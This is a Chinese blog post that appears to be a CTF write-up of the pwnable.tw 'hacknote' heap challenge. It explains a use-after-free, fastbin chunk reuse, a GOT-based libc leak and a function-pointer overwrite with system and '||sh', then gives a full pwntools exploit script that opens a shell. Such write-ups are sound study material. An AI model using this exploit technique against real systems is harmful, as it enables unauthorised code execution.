pwnable.tw——hacknote分析

最新推荐文章于 2024-01-29 02:22:19 发布
最新推荐文章于 2024-01-29 02:22:19 发布
阅读量354 收藏
点赞数
分类专栏: pwn题目
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eagle_hwei/article/details/104487250
版权

hacknote的题目分析

2020-02-24 21:22:47 by hawkJW

题目附件、ida文件及wp链接

   这是一道比较经典的题目,所以稍微记录一下

  1.  程序流程总览

首先,还是老规矩,看一下保护情况

  可以看出来,PIE没有开启,可以修改got表,其余基本上都开启了,保护程度一般吧。下面我们来看一下程序的具体流程吧。

没什么好说的,还是比较经典的菜单题目。但是需要注意的是,对于note仅仅有 add 、 delete 和 print 功能,也就是没有修改功能,这个可能会对我们造成一定的影响

 

2.  漏洞

 

  实际上,这个题目就是一道典型的堆问题。我们需要说先介绍一下对应的数据结构。

实际上,正如如下的源代码所显示的一样

首先请求一个控制chunk(实际大小为0x10),则其有0x8的可用空间,前4字节实际上是一个函数指针——后面会提到,后四个字节指向真正的输入内容部分,也就是info chunk。

而释放的时候则是首先释放info chunk,其次再释放控制chunk,代码如图所示

而此处就有一个漏洞——UAF漏洞,即释放之后并没有清空指针,则仍然可以调用其他的相关函数。

继续介绍数据结构。

下面就是 print 函数的部分,代码如图所示,

也就是,实际上调用了控制chunk可用部分的前4个字节的函数指针所指向的函数,参数为控制chunk可用部分地址。

那么,如果我们可以修改控制chunk中可用部分的前4个字节所指向的位置,修改为system,并在后四个字节中添加上 ||sh (这里一开始没想到,注意为了执行shell命令,可以的一些方法 sh# 或者 ||sh ,前一个可以注释掉后面的字符串,后一个如果前面不是有效命令的话可以执行shell),那么我们则可以成功获取到shell脚本。

3.  漏洞利用

  

 

这里我们介绍一下如何使用这个漏洞——实际上,用到了fast bin的分配原理,这里不详细介绍,直接说结论——释放掉fast bin的时候,会根据大小进行分类,并且每次请求的时候会按照后释放先分配的顺序在对应的类中重新进行分配。那么问题也就简单了,如果我们连续申请两个note(记住要让info chunk的大小大于0x10,否则就无法成功利用该漏洞),释放掉后再次申请一个note(此时要让info chunk的大小等于0x10),此时,根据之前所说的,此时的info chunk实际上就是前面的释放掉的note的其中一个控制chunk(因为他们大小相等),而我们可以向该note的info chunk,也就是前两个note之一的控制chunk输入,则成功达到我们的目的。之后我们就可以通过释放该note在重新申请同样大小的info chunk的note,来反复修改前两个note之一的控制chunk,从而完成漏洞利用,结构图如图所示

最后放上完整的wp

#coding:utf-8

from pwn import *

#context.log_level = 'debug'

debug = 1


def wp_add(size, content):
	r.recvuntil('Your choice :')
	r.send('1'.ljust(4, '\x00'))

	r.recvuntil('Note size :')
	r.send(str(size).ljust(8, '\x00'))

	r.recvuntil('Content :')
	r.send(content)


def wp_delete(index):
	r.recvuntil('Your choice :')
	r.send('2'.ljust(4, '\x00'))

	r.recvuntil('Index :')
	r.send(str(index).ljust(4, '\x00'))
	

def wp_print(index):
	r.recvuntil('Your choice :')
	r.send('3'.ljust(4, '\x00'))

	r.recvuntil('Index :')
	r.send(str(index).ljust(4, '\x00'))
	return r.recv(4)


def wp_exit():
	r.recvuntil('Your choice :')
	r.send('4'.ljust(4, '\x00'))



def exp(debug):

	global r
	
	if debug == 1:
		r = process('./hacknote')
		#gdb.attach(r, 'b *0x0804869A')
		lib = ELF('/lib/i386-linux-gnu/libc-2.23.so')
	else:
		r = remote('111.198.29.45', 41471)
		lib = ELF('./hacknote_lib')

	elf = ELF('./hacknote')
	print elf.got['puts']
	wp_add(0x20, 'a')	#index:0
	wp_add(0x20, 'a')	#index:1
	wp_delete(0)
	wp_delete(1)
	wp_add(0x8, p32(0x0804862B) + p32(elf.got['puts']))	#index:2
	lib_base = u32(wp_print(0)) - lib.sym['puts']
	log.info('lib_base => %#x'%lib_base)

	wp_delete(2)
	wp_add(0x8, p32(lib_base + lib.sym['system']) + '||sh')
	wp_print(0)
	r.interactive()


	

exp(debug)

 

HawkJW
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
TW6.1.5.8-Enterprise-Linux
08-31
TW6.1.5.8_Enterprise_Linux TongHttpServer(THS)是一款功能强大、稳定高效、高性价比、易于使用、便于维护的负载均衡软件产品。THS 不仅可以满足用户对负载均衡服务的需求,提升系统可靠性、高效性、可扩展性及...
pwnable_hacknote
m0sway的博客
01-13 405
pwnable_hacknote 使用checksec查看: 开启了Canary和栈不可执行,没有开启PIE。 先运行一下看看: 看到菜单,应该是一道堆题了,放进IDA中查看: 这里我已经将函数重命名了,接下来分步看: sub_8048956(): 对应menu(),略过 sub_8048646(): ptr[i] = malloc(8u);:程序首先会自动创建一个0x8大小的chunk *(_DWORD *)ptr[i] = puts_0;:puts_0内容是return puts(*(c
【PWN刷题】Pwnable-hacknote
QYbudong的博客
05-06 370
回顾经典老题。一、
pwnable_hacknote_WP
weixin_56434818的博客
03-01 723
pwnable_hacknote_WP 文章目录pwnable_hacknote_WP检查保护分析ELFAdd noteDelete notePrint note利用思路exp 检查保护 ​ i386架构,RELRO半开,开了Canary和NX,没开PIE。 分析ELF 先跑一下 类似菜单的程序,有增、删、查的操作。 IDA反编译后发现主函数主要就是根据选项选择菜单内相应功能的作用,若输入范围之外的数字则会出现错误提示并重新选择。(因为主函数逻辑不是很复杂所以这里就不贴反编译出来的代码了) Add no
Assassins.Creed.III.TW.THETA.RIP.torrent
07-20
Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME.Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME.Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME.Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME....
MP4播放器_mp4播放器_player_mp4_mp4ba.tw_
10-03
Mp4 player 支持各种格式的mp4
rate.bot.com.tw:台湾银行黄金价格抓取程式
06-11
台湾银行黄金价格抓取程式 序 此程式以语言撰写,以日期为参数抓取台湾银行。... GET http://rate.bot.com.tw/Pages/UIP005/UIP00511.aspx?whom=GB0030001000&afterOrNot=0&curcd=TWD&date=20000101 只需变换date参数。
docs.roy4801.tw
02-12
docs.roy4801.tw
hacknote.zip
12-30
本题目是攻防世界一道6分的堆漏洞题目,在ctf wiki上面有比较详细的解析和漏洞利用,几乎一模一样,但区别是这道题没有后门函数,所以漏洞利用的方式发生了变化,推荐大家动手分析
[BUUCTF]-PWN:pwnable_hacknote解析
最新发布
2301_79326813的博客
01-29 255
先看保护32位,没开pie,got表可修改看ida总的来说就是alloc创建堆块,free释放堆块,show打印堆块内容但alloc处的函数比较特别,他会先申请一个0x8大小的堆来存放与puts相关的指针。
pwnable.twhacknote
qq_35429581的博客
10-13 2888
uaf漏洞产生的主要原因是释放了一个堆块后,并没有将该指针置为NULL,这样导致该指针处于悬空的状态(有的地方翻译为迷途指针),同样被释放的内存如果被恶意构造数据,就有可能会被利用。 再怎么表述起始还不如真的拿一道题自己调自己看内存看堆状态来的好理解。这也是我觉得ctf-pwn的意义所在,可以把一些漏洞抽象出来以题的形式,作为学习这方面的一个抓手。 此篇尽量做的细致基础,但仍然假设读者已经初步
什么是私有地址?如何分类?
热门推荐
qq_44047479的博客
10-30 2万+
什么是私有地址?如何分类? 在现在的网络中,IP地址分为公网IP地址和私有IP地址。 公网IP是在Internet使用的IP地址,而私有IP地址则是在局域网中使用的IP地址。 私有IP地址是一段保留的IP地址。只使用在局域网中,无法在Internet上使用。 当私有网络内的主机要与位于公网上的主机进行通讯时必须经过地址转换,将其私有地址转换为合法公网地址才能对外访问。 NAT-Network Address Translation 网络地址转换 所谓的私有地址就是在互联网上不使用,而被用在局域网络中的地址
持续更新 BUUCTF——PWN(二)
weixin_41748164的博客
12-14 349
buuctf pwn 第三页
pwnable_hacknote 5/100
m0_57754423的博客
03-01 161
uaf漏洞利用 sh “;”间隔执行命令 exp: from pwn import * from LibcSearcher import * local_file = './hacknote' # local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' # remote_libc = './libc-2.23.so' select = 1 if select == 0: p = process(local_file) #.
pwnable.tw - hacknote(uaf漏洞利用)
fanghuapyk的博客
12-07 409
pwnable.tw -hacknote 前言: 看了几个大佬写的pwnable.tw-hacknote ,自己也尝试写一下; 程序分析: 首先运行一下程序 发现这里有add_note ,delete_note ,print_note三个功能,我们看一下main函数,add_note,和delete_note 函数, main函数: add_note函数: 可以看到首先为ptr+note_offs...
net.ipv4.tcp_tw_recycle
03-16
net.ipv4.tcp_tw_recycle是 Linux 下用于重用 TIME_WAIT 状态的套接字,可以设置为 0 或 1,其中 0 表示禁用,1 表示启用。net.ipv4.tcp_tw_recycle是一个Linux内核参数,用于控制TCP连接的回收行为。如果该参数被...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值